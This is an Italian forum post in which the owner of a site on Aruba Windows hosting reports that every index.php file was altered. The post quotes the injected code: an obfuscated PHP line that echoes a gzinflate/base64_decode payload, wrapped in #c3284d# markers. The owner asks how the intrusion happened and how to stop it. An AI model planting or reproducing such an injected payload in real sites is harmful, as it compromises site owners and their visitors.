Ciao a tutti, spero sia la sezione giusta per scrivere,
ieri ho subito il mio primo attacco su un sito che gestisco su aruba (hosting windows)
Tutti gli index.php nelle varie sottodirectory sono stati modificati, in particolare č stata aggiunta la riga
#c3284d#
echo(gzinflate(base64_decode("VVFNT8MwDL1P2n/ILa0Y7Tpot0E3NBAHTly4MVSljdtGypIscffx70nLmMA3289+7 9m5q6wwuB6PDsySYk9WhOuq24HCqLLAEF4l9FlARW3ZDmg4GY+ Ij0J5LHWAG0Qryg6BPo5Hxf6zUF8BdbaiE0JbRPMQxw6Z9fskM CtF02ILTArVRFUbc9jp2PlEQlzpTiHYyLTmyQm+Smg4rIwcniV ERjuBQg+8rHRaXjkvgKPg2PbdbGpOf9UMykttOVivSrGDaBhqG 3UO7KbpvQrF4fReB7S8m86W6f0snWbJvK4Szso0y+aLNFuyRcp KGpIbkvzTJaHGnvU2my3nP8TXGx6tQAhozsWBeEdb+nEU6D1u6 TqPfXE9WLzCG8DLvZ/Pbzz4RdMwYsaA4i+tkDwo9v1QHl9+9w0=")));
#/c3284d#
Il bello č che sono stati modificati solo i php.
Ora, al di lā di quello che si vuol fare aggiungendo del codice, la domanda č come č possibile che abbiano effettuato un accesso su questo spazio?
E soprattutto come posso impedire altre eventuali modifiche?
Devo avvisare aruba?
Rispondi quotando
